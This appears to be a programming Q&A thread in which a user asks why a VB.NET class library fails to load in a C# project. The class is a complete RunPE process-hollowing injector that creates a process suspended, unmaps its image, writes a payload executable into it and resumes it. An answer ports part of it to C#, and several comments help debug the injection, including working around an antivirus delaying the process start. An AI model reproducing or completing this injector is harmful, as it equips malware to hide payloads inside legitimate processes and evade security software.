# Why cant I use a VB.NET Class Library in my C# project?

Tags: c#, vb.net

I was trying to use VB.NET code in C# using a dll but I couldn't.

```vb
Class MenaPE

    '------------------------------
    'Title: MenaPE (RunPE Class)
    'Author: Menalix
    'Website: Menalix.com
    'Notice: For teaching purposes
    '------------------------------

    #Region "Static API Calls"

        Declare Function LoadLibraryA Lib "kernel32" (ByVal Name As String) As IntPtr
        Declare Function GetProcAddress Lib "kernel32" (ByVal hProcess As IntPtr, ByVal Name As String) As IntPtr
    #End Region

    #Region "Dynamic API Caller"

        Private Function CreateApi(Of T)(ByVal Name As String, ByVal Method As String) As T
            Return DirectCast(DirectCast(Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), GetType(T)), Object), T)
        End Function

    #End Region

    #Region "Dynamic API's"

        Private Delegate Function ReadProcessMemoryParameters(ByVal hProcess As UInteger, ByVal lpBaseAddress As IntPtr, ByRef lpBuffer As Integer, ByVal nSize As IntPtr, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean
        ReadOnly ReadProcessMemory As ReadProcessMemoryParameters = CreateApi(Of ReadProcessMemoryParameters)("kernel32", "ReadProcessMemory")

        Private Delegate Function CreateProcessParameters( _
        ByVal ApplicationName As String, _
        ByVal CommandLine As String, _
        ByVal ProcessAttributes As IntPtr, _
        ByVal ThreadAttributes As IntPtr, _
        ByVal InheritHandles As Boolean, _
        ByVal CreationFlags As UInteger, _
        ByVal Environment As IntPtr, _
        ByVal CurrentDirectory As String, _
        ByRef StartupInfo As STARTUPINFO, _
        ByRef ProcessInformation As PROCESS_INFORMATION) As Boolean
        Dim CreateProcess As CreateProcessParameters = CreateApi(Of CreateProcessParameters)("kernel32", "CreateProcessA")

        Private Delegate Function NtQueryInformationProcessParameters(ByVal hProcess As IntPtr, _
        ByVal ProcessInformationClass As Integer, _
        ByRef ProcessInformation As PROCESS_BASIC_INFORMATION, _
        ByVal ProcessInformationLength As UInteger, _
        ByRef ReturnLength As UIntPtr) As UInteger
        ReadOnly NtQueryInformationProcess As NtQueryInformationProcessParameters = CreateApi(Of NtQueryInformationProcessParameters)("ntdll", "NtQueryInformationProcess")

        Private Delegate Function GetThreadContext64Parameters( _
        ByVal hThread As IntPtr, _
        ByRef lpContext As CONTEXT32) As Boolean
        Dim GetThreadContext64 As GetThreadContext64Parameters = Nothing

        Private Delegate Function IsWow64ProcessParameters( _
        ByVal hProcess As IntPtr, _
        ByRef Wow64Process As Boolean) As Boolean
        ReadOnly IsWow64Process As IsWow64ProcessParameters = CreateApi(Of IsWow64ProcessParameters)("kernel32", "IsWow64Process")

        Private Delegate Function WriteProcessMemoryParameters( _
        ByVal hProcess As IntPtr, _
        ByVal lpBaseAddress As IntPtr, _
        ByVal lpBuffer As Byte(), _
        ByVal nSize As UInteger, _
        ByRef lpNumberOfBytesWritten As UInteger) As Boolean
        ReadOnly WriteProcessMemory As WriteProcessMemoryParameters = CreateApi(Of WriteProcessMemoryParameters)("kernel32", "WriteProcessMemory")

        Private Delegate Function NtUnmapViewOfSectionParameters( _
        ByVal hProcess As IntPtr, _
        ByVal pBaseAddress As IntPtr) As UInteger
        ReadOnly NtUnmapViewOfSection As NtUnmapViewOfSectionParameters = CreateApi(Of NtUnmapViewOfSectionParameters)("ntdll", "NtUnmapViewOfSection")

        Private Delegate Function VirtualAllocExParameters( _
        ByVal hProcess As IntPtr, _
        ByVal lpAddress As IntPtr, _
        ByVal dwSize As UInteger, _
        ByVal flAllocationType As UInteger, _
        ByVal flProtect As UInteger) As IntPtr
        ReadOnly VirtualAllocEx As VirtualAllocExParameters = CreateApi(Of VirtualAllocExParameters)("kernel32", "VirtualAllocEx")

        Private Delegate Function ResumeThreadParameters( _
        ByVal hThread As IntPtr) As UInteger
        ReadOnly ResumeThread As ResumeThreadParameters = CreateApi(Of ResumeThreadParameters)("kernel32", "ResumeThread")

    #End Region

    #Region "API Structures"
        Private Structure PROCESS_INFORMATION
            Public hProcess As IntPtr
            Public hThread As IntPtr
            Public dwProcessId As UInteger
            Public dwThreadId As UInteger
        End Structure
        Private Structure STARTUPINFO
            Public cb As UInteger
            Public lpReserved As String
            Public lpDesktop As String
            Public lpTitle As String
            <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> _
            Public Misc As Byte()
            Public lpReserved2 As Byte
            Public hStdInput As IntPtr
            Public hStdOutput As IntPtr
            Public hStdError As IntPtr
        End Structure
        Structure FLOATING_SAVE_AREA
            Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
            <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
            Dim State As UInteger
        End Structure
        Structure CONTEXT32
            Dim ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7 As UInteger
            Dim FloatSave As FLOATING_SAVE_AREA
            Dim SegGs, SegFs, SegEs, SegDs, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SegCs, EFlags, Esp, SegSs As UInteger
            <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim ExtendedRegisters As Byte()
        End Structure
        Structure PROCESS_BASIC_INFORMATION
            Public ExitStatus As IntPtr
            Public PebBaseAddress As IntPtr
            Public AffinityMask As IntPtr
            Public BasePriority As IntPtr
            Public UniqueProcessID As IntPtr
            Public InheritedFromUniqueProcessId As IntPtr
        End Structure
    #End Region

    #Region "Injection"

        Public Function Run(ByVal path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
            For I As Integer = 1 To 5
                If HandleRun(path, payload, creationflag) Then Return True
            Next
            Return False
        End Function

        Private Function HandleRun(ByVal Path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
            Dim ReadWrite As Integer = Nothing
            Dim QuotedPath As String = String.Format("""{0}""", Path)

            Dim SI As New STARTUPINFO
            Dim PI As New PROCESS_INFORMATION

            SI.cb = CUInt(Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUPINFO))) 'Parses the size of the structure to the structure, so it retrieves the right size of data

            Try
                'COMMENT: Creating a target process in suspended state, which makes it patch ready and we also retrieves its process information and startup information.
                If Not CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, True, creationflag, IntPtr.Zero, IO.Directory.GetCurrentDirectory, SI, PI) Then Throw New Exception()

                'COMMENT: Defines some variables we need in the next process
                Dim ProccessInfo As New PROCESS_BASIC_INFORMATION
                Dim RetLength As UInteger
                Dim Context = Nothing
                Dim PEBAddress32 As Integer = Nothing
                Dim PEBAddress64 As Int64 = Nothing
                Dim TargetIs64 As Boolean = Nothing
                Dim IsWow64Proc As Boolean = False

                IsWow64Process(PI.hProcess, IsWow64Proc) 'COMMENT: Retrieves Boolean to know if target process is a 32bit process running in 32bit system, or a 32bit process running under WOW64 in a 64bit system.
                If IsWow64Proc Or IntPtr.Size = 4 Then 'COMMENT: Checks the Boolean retrieved from before OR checks if our calling process is 32bit
                    Context = New CONTEXT32
                    Context.ContextFlags = &H1000002L 'COMMENT: Parses the context flag CONTEXT_AMD64(&H00100000L) + CONTEXT_INTEGER(0x00000002L) to tell that we want a structure of a 32bit process running under WOW64, you can see all context flags in winnt.h header file.
                    If IsWow64Proc AndAlso IntPtr.Size = 8 Then 'COMMENT: Checks if our own process is 64bit and the target process is 32bit in wow64
                        GetThreadContext64 = CreateApi(Of GetThreadContext64Parameters)("kernel32", "Wow64GetThreadContext") 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
                        If Not GetThreadContext64(PI.hThread, Context) Then Throw New Exception
                        Console.WriteLine(Context.Ebx)
                        PEBAddress32 = Context.Ebx
                        TargetIs64 = False
                    Else 'COMMENT: If our process is 32bit and the target process is 32bit we get here. 
                        NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
                        PEBAddress32 = ProccessInfo.PebBaseAddress
                        TargetIs64 = False
                    End If
                Else 'COMMENT: If our process is 64bit and the target process is 64bit we get here. 
                    NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
                    PEBAddress64 = ProccessInfo.PebBaseAddress
                    TargetIs64 = True
                End If


                Dim BaseAddress As IntPtr
                If TargetIs64 = True Then
                    ReadProcessMemory(PI.hProcess, PEBAddress64 + &H10, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 64bit Process, which is where the exe data starts
                Else
                    ReadProcessMemory(PI.hProcess, PEBAddress32 + &H8, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 32bit Process, which is where the exe data starts
                End If

                Dim PayloadIs64 As Boolean = False
                Dim dwPEHeaderAddress As Integer = BitConverter.ToInt32(payload, &H3C) 'COMMENT: Gets the PEHeader start address
                Dim dwNetDirFlags As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H398) 'COMMENT: Gets the .NET Header Flags value to determine if its a AnyCPU Compiled exe or not
                Dim wMachine As Integer = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H4) 'COMMENT: Gets the reads the Machine value

                If wMachine = 8664 Then : PayloadIs64 = True 'Checks the Machine value to know if payload is 64bit or not"
                Else : PayloadIs64 = False : End If

                If PayloadIs64 = False Then
                    If dwNetDirFlags = &H3 Then 'To make sure we don't rewrite flags on a Payload which is already AnyCPU Compiled, it will only slow us down
                        Buffer.SetByte(payload, dwPEHeaderAddress + &H398, &H1) 'Replaces the .NET Header Flag on a 32bit compiled payload, to make it possible doing 32bit -> 64bit injection
                    End If
                End If

                Dim dwImageBase As Integer
                If PayloadIs64 = True Then
                    dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H30) 'Reads the ImageBase value of a 64bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual addressstart location for our exe in its own memory space
                Else
                    dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H34) 'Reads the ImageBase value of a 32bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual address start location for our exe in its own memory space
                End If

                If dwImageBase = BaseAddress Then 'COMMENT: If the BaseAddress of our Exe is matching the ImageBase, it's because it's mapped and we have to unmap it
                    If Not NtUnmapViewOfSection(PI.hProcess, BaseAddress) = 0 Then Throw New Exception() 'COMMENT: Unmapping it
                End If

                Dim dwSizeOfImage As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H50)
                Dim dwNewImageBase As Integer = VirtualAllocEx(PI.hProcess, dwImageBase, dwSizeOfImage, &H3000, &H40) 'COMMENT: Makes the process ready to write in by specifying how much space we need to do it and where we need it
                If dwNewImageBase = 0 Then Throw New Exception()

                Dim dwSizeOfHeaders As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H54)
                If Not WriteProcessMemory(PI.hProcess, dwNewImageBase, payload, dwSizeOfHeaders, ReadWrite) Then Throw New Exception() 'Writes the size of the payloads PE header to the target

                'COMMENT: This is here where most of the magic happens. We write in all our sections data, which contains our resssources, code and the information to utilize the sections: VirtualAddress, SizeOfRawData and PointerToRawData
                Dim SizeOfOptionalHeader As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H14)
                Dim SectionOffset As Integer = dwPEHeaderAddress + (&H16 + SizeOfOptionalHeader + &H2)
                Dim NumberOfSections As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H6)
                For I As Integer = 0 To NumberOfSections - 1
                    Dim VirtualAddress As Integer = BitConverter.ToInt32(payload, SectionOffset + &HC)
                    Dim SizeOfRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H10)
                    Dim PointerToRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H14)
                    If Not SizeOfRawData = 0 Then
                        Dim SectionData(SizeOfRawData - 1) As Byte
                        Buffer.BlockCopy(payload, PointerToRawData, SectionData, 0, SectionData.Length)
                        If Not WriteProcessMemory(PI.hProcess, dwNewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
                    End If
                    SectionOffset += &H28
                Next

                Dim PointerData As Byte() = BitConverter.GetBytes(dwNewImageBase)
                If TargetIs64 = True Then
                    If Not WriteProcessMemory(PI.hProcess, PEBAddress64 + &H10, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new etrypoint for 64bit target
                Else
                    If Not WriteProcessMemory(PI.hProcess, PEBAddress32 + &H8, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new entrypoint for 32bit target
                End If
                If ResumeThread(PI.hThread) = -1 Then Throw New Exception() 'Resumes the suspended target with all its new exciting data

            Catch ex As Exception
                Dim P As Process = Process.GetProcessById(CInt(PI.dwProcessId))
                If P IsNot Nothing Then P.Kill()
                Return False
            End Try

            Return True
        End Function
    #End Region

End Class
```

I was trying to put in my `main` function, but when I call my function all time show me the same error:

[image: introducir la descripción de la imagen aquí]

If my `main` is static, how I can include it and use it? At the moment, I can't:

[image: introducir la descripción de la imagen aquí]

Class Library reference:[image]

I tried creating the class:

```
MenaP mp = new MenaPE();
```

However show me:

> The type or namespace name 'MenaPE' could not be found (are you
>   missing a using directive or an assembly reference?) (CS0246) -
>   C:\Users\Androide\Desktop- Copy - Copy\Stub\Program.cs:26,20 The type
>   or namespace name 'MenaP' could not be found (are you missing a using
>   directive or an assembly reference?) (CS0246) -
>   C:\Users\Androide\Desktop\ - Copy - Copy\Stub\Program.cs:26,5

Comment: Did you add the reference to the project containing the VB.NET code? After that add the using statement to the namespace of the VB.NET class. You should be able to see Intellisense working then and you can compile the code

Comment: For some unfathomable reason, these VB methods are not declared Shared.  So you must use `new MenaPE()` to create an instance of the class.

Comment: Apparently it was a module at some point. It does not even have any class variables.

Comment: the error that it's not a error because i can't use my class i dont know. but the console show me `The name 'MenaPE' does not exist in the current context (CS0103) - C:\Users\Androide\Desktop\- Copy - Copy\Stub\Program.cs:26,13.`  And i think because it is taking me like namspace and i can't use my class using a static main. I dont know why.

Comment: Do you have two distinct projects in your solution? One for the VB.NET code and one for the C# one?

Comment: I have the dll for VB.NET included in my project in C#. However, i can't use my class showing me the before error that i commented.

Comment: What do you mean with _included_? Did you add a reference in the C# project to the VB.NET project?. It is not enough to have the two projects in the same solution. https://msdn.microsoft.com/en-us/library/wkze6zky.aspx

Comment: Yeah i have referenced the class library , exactly. But, i can't use it in my C# project . First, i put the reference of this library. Second, add MenaPE Class and call the method using this way: `MenaPE.Run(fullPath,File.ReadAllBytes(@"C:\Users\Androide\Desktop\Desktop\Desktop\ - Copy\\bin\Debug\Console.exe"),0x10);` but if i do that show me             doesnt exist in the current context so i can't use my class in my project. i have the reference in my c# project. of course. I will upload a picture with the reference.. (And the reason i think because have a conflict between class and namespa

Comment: Well, a lot of time ago @HansPassant has told you about the problem then

Comment: I've been thinking about this all week since your last posting.  I know I can do it without the delegates.  I'm not sure exactly how in c# to convert the parameters using delegates.  VB works does some automatic conversion that aren't done in c#.  Read literature on-line you must use _stdcall convention (not c convention).  So adding to DllImport may help.  Also read following webpage the Remarks at the bottom : https://msdn.microsoft.com/en-us/library/dn261456(v=vs.110).aspx

Comment: The code is using standard windows dll (see www.pinvoke.net) with a msdn wrapper(GetDelegateForFunctionPointer) that converts the unmanaged dlls parameters to managed dll objects.This method seems to work in VB but not in c#.So I suspect either there are bugs in the wrapper using c# or we are declaring the variable wrong.As I said last week the VB code does some strange things with UINT. Since UINT and IntPtr are the same number of bytes, the VB code uses them inter-changeably. The c# code you can't because of additional error checking in c#. The easiest solution is to get rid of the delegate.

Comment: i'm not sure if it's for that, but i must the check all points, first thing i create my new class but maybe i must to put first all methods like shared. Maybe this will fix the problem not sure. still i didnt try because all my api's can't be used using shared method.

Comment: In your last screenshot there's a warning saying `The primary reference "MenaPE" could not be resolved because...`. Can you post the entire message?

Answer (score 0):

I got the code to run NtQueryInformationProcess and get a value of PEBAddress32ptr (this is a point to an addrress).  The code below is just test code and I removed all other code to somplify the currect issue.

```
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;

namespace MenaPE
{
    class Program
    {
        static void Main(string[] args)
        {
            const uint NORMAL_PRIORITY_CLASS = 0x0020;

            string Application = Environment.GetEnvironmentVariable("windir") + @"\Notepad.exe";
            string CommandLine = @" c:\temp\test.txt";
            //PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();
            //STARTUPINFO sInfo = new STARTUPINFO();
            //SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
            //SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
            //pSec.nLength = Marshal.SizeOf(pSec);
            //tSec.nLength = Marshal.SizeOf(tSec);


            byte[] payload = null;
            MenaPE menaPE = new MenaPE();
            menaPE.Run(Application, CommandLine, payload, NORMAL_PRIORITY_CLASS);
        }
    }
    public class MenaPE
    {
        [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
        public static extern IntPtr LoadLibraryA(string Name);

        [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
        public static extern IntPtr GetProcAddress(IntPtr hProcess, string Name);


        private static T CreateApi<T>(string Name, string Method)
        {
            return (T)(object)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), typeof(T));
        }

        private delegate bool CreateProcessParameters(string ApplicationName, string CommandLine, IntPtr ProcessAttributes, IntPtr ThreadAttributes, bool InheritHandles, uint CreationFlags, IntPtr Environment, string CurrentDirectory, ref STARTUPINFO StartupInfo, ref PROCESS_INFORMATION ProcessInformation);
        CreateProcessParameters CreateProcess = CreateApi<CreateProcessParameters>("kernel32", "CreateProcessA");


        private delegate uint NtQueryInformationProcessParameters(IntPtr hProcess, int ProcessInformationClass, IntPtr ProcessInformationptr, uint ProcessInformationLength, IntPtr ReturnLength);
        readonly NtQueryInformationProcessParameters NtQueryInformationProcess = CreateApi<NtQueryInformationProcessParameters>("ntdll", "NtQueryInformationProcess");

        private delegate bool IsWow64ProcessParameters(IntPtr hProcess, out bool Wow64Process);
        readonly IsWow64ProcessParameters IsWow64Process = CreateApi<IsWow64ProcessParameters>("kernel32", "IsWow64Process");


        private struct PROCESS_INFORMATION
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public uint dwProcessId;
            public uint dwThreadId;
        }
        private struct STARTUPINFO
        {
            public uint cb;
            public string lpReserved;
            public string lpDesktop;
            public string lpTitle;
            [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst = 36)]
            public byte[] Misc;
            public byte lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }
        public struct FLOATING_SAVE_AREA
        {
            public uint Control;
            public uint Status;
            public uint Tag;
            public uint ErrorO;
            public uint ErrorS;
            public uint DataO;
            public uint DataS;
            [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst = 80)]
            public byte[] RegisterArea;
            public uint State;
        }
        public struct CONTEXT32
        {
            public uint ContextFlags;
            public uint Dr0;
            public uint Dr1;
            public uint Dr2;
            public uint Dr3;
            public uint Dr6;
            public uint Dr7;
            public FLOATING_SAVE_AREA FloatSave;
            public uint SegGs;
            public uint SegFs;
            public uint SegEs;
            public uint SegDs;
            public uint Edi;
            public uint Esi;
            public uint Ebx;
            public uint Edx;
            public uint Ecx;
            public uint Eax;
            public uint Ebp;
            public uint Eip;
            public uint SegCs;
            public uint EFlags;
            public uint Esp;
            public uint SegSs;
            [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst = 512)]
            public byte[] ExtendedRegisters;
        }

        public struct PROCESS_BASIC_INFORMATION
        {
            public IntPtr ExitStatus;
            public IntPtr PebBaseAddress;
            public IntPtr AffinityMask;
            public IntPtr BasePriority;
            public IntPtr UniqueProcessID;
            public IntPtr InheritedFromUniqueProcessId;
        }

        public bool Run(string path, string QuotedPath, byte[] payload, uint creationflag)
        {
            for (int I = 1; I <= 5; I++)
            {
                if (HandleRun(path, QuotedPath, payload, creationflag))
                    return true;
            }
            return false;
        }
        private bool HandleRun(string Path, string QuotedPath, byte[] payload, uint creationflag)
        {
            IntPtr nullPtr = IntPtr.Zero;

            uint ReadWrite = 0;

            STARTUPINFO SI = new STARTUPINFO();
            PROCESS_INFORMATION PI = new PROCESS_INFORMATION();

            SI.cb = Convert.ToUInt32(System.Runtime.InteropServices.Marshal.SizeOf(typeof(STARTUPINFO)));
            //Parses the size of the structure to the structure, so it retrieves the right size of data

            try
            {
                //COMMENT: Creating a target process in suspended state, which makes it patch ready and we also retrieves its process information and startup information.
                if (!CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, true, creationflag, IntPtr.Zero, Directory.GetCurrentDirectory(), ref SI, ref PI))
                    throw new Exception();


                //COMMENT: Defines some variables we need in the next process
                PROCESS_BASIC_INFORMATION ProccessInfo = new PROCESS_BASIC_INFORMATION();
                IntPtr ProccessInfoptr = Marshal.AllocCoTaskMem(Marshal.SizeOf(ProccessInfo));

                IntPtr RetLength = IntPtr.Zero;
                CONTEXT32 Context;
                IntPtr PEBAddress32ptr =  IntPtr.Zero;
                Int64? PEBAddress64 = null;
                bool TargetIs64 = false;
                bool IsWow64Proc = false;

                IsWow64Process(PI.hProcess, out IsWow64Proc);
                //COMMENT: Retrieves Boolean to know if target process is a 32bit process running in 32bit system, or a 32bit process running under WOW64 in a 64bit system.
                //COMMENT: Checks the Boolean retrieved from before OR checks if our calling process is 32bit
                if (IsWow64Proc | IntPtr.Size == 4)
                {
                    Context = new CONTEXT32();
                    Context.ContextFlags = 0x1000002;
                    //COMMENT: Parses the context flag CONTEXT_AMD64(&H00100000L) + CONTEXT_INTEGER(0x00000002L) to tell that we want a structure of a 32bit process running under WOW64, you can see all context flags in winnt.h header file.
                    //COMMENT: Checks if our own process is 64bit and the target process is 32bit in wow64
                    if (IsWow64Proc && IntPtr.Size == 8)
                    {
                    }
                    else
                    {

                        uint query = NtQueryInformationProcess(PI.hProcess, 0, ProccessInfoptr, (uint)System.Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength);
                        //COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
                        ProccessInfo = (PROCESS_BASIC_INFORMATION)Marshal.PtrToStructure(ProccessInfoptr, typeof(PROCESS_BASIC_INFORMATION));
                        PEBAddress32ptr = ProccessInfo.PebBaseAddress;
                        TargetIs64 = false;
                    }
                    //COMMENT: If our process is 64bit and the target process is 64bit we get here. 
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error : {0}", ex.Message);

            }
            return true;
        }
    }

}
```

Comment: You did a lot of fixes, now the code is more clear and create process fine. I saw you included a new parameter quotedpath. payload is null but in the other case normally i enter the path using : `MenaPE.Run(@"File where load file",File.ReadAllBytes(@"File to load"),0x10);` So all the payload process must to be included? and all process creation is different. the code is more clear now.

Comment: I just simplified the code to get it to run.  You need to add the rest of the code back if you want to run in 32/32, 32/64,64/32,64/64.  I also moved command line to the parameter list rather than hard code the value so I could test with NotePad and specify the file I was using. So you need to test with your kill process. I used www.pinvoke.net a lot to verify the changes.  It was a great reference with good examples.

Comment: I included in the code like you said to run 32/32, 32/64,64/32,64/64, but i am not sure why i get `Error : Value cannot be null.Parameter name: ptr` i only was trying to include the before process: https://pastebin.com/Xbi414UF

Comment: It is probably the IntPtr.  Use IntPtr.Zero

Comment: I used IntPtr PEBAddress32 = nullPtr; to use the rest of program, i changed that in the pastebin, however the result was http://i.imgur.com/lF6j6Et.png. so i will try again but i didnt get repeat the same process and get it to works like vb.net.

Comment: I don't have the executable(s) so I can't test exactly the same.  I made one change removing the marshal and change to offset :                    // Marshal.StructureToPtr(PEBAddress32 + 0x08, PEBAddress32ptr, true);
                    ReadProcessMemory(PI.hProcess, PEBAddress32ptr + 0x08, ref BaseAddress, 4, ref ReadWrite);

Comment: readprocessmemory show `Error : Value cannot be null.Parameter name: ptr` so i did this change IntPtr PEBAddress32 = nullPtr; and this is fixed but when you continue with the course of the program, happen the same `Marshal.StructureToPtr(dwImageBase, dwImageBaseptr, true);` showing the same Error : Value cannot be null.Parameter etc.. it's only say you maybe you get a smart conclusion and understand why.

Comment: Look at my last fix : PEBAddress32ptr + 0x08.  The address is really the pointer with an offset being PEBAddress32.  I was getting same error before the last fix.That is why I'm kind of giving up. I don't know enough about the original VB code to determine what the offsets should be.I think there unique to the Application running and don't want to start guessing.Read the documentation at www.pinvoke.net against each to the dll.I will help explain issues.Right now to debug without the exact same application as the original VB.You can run the orignal VB and the c# and compare values to see diff.

Comment: i get exception vb.net  original source. Because when you use it sometimes dwimagebase is null, so when i catch the exception, it search in the process and like it doesnt create the process well "i think" launch this exception  Process with an Id of 5224 is not running.
so i dont know why happen this, command line is so bad in vb.net.

Comment: May be its a timing issue that the process doesn't start immediately.  thre cold be a virus checker on the system that is delaying the process from starting.  Try putting a delay in the program and see if that improves the condition.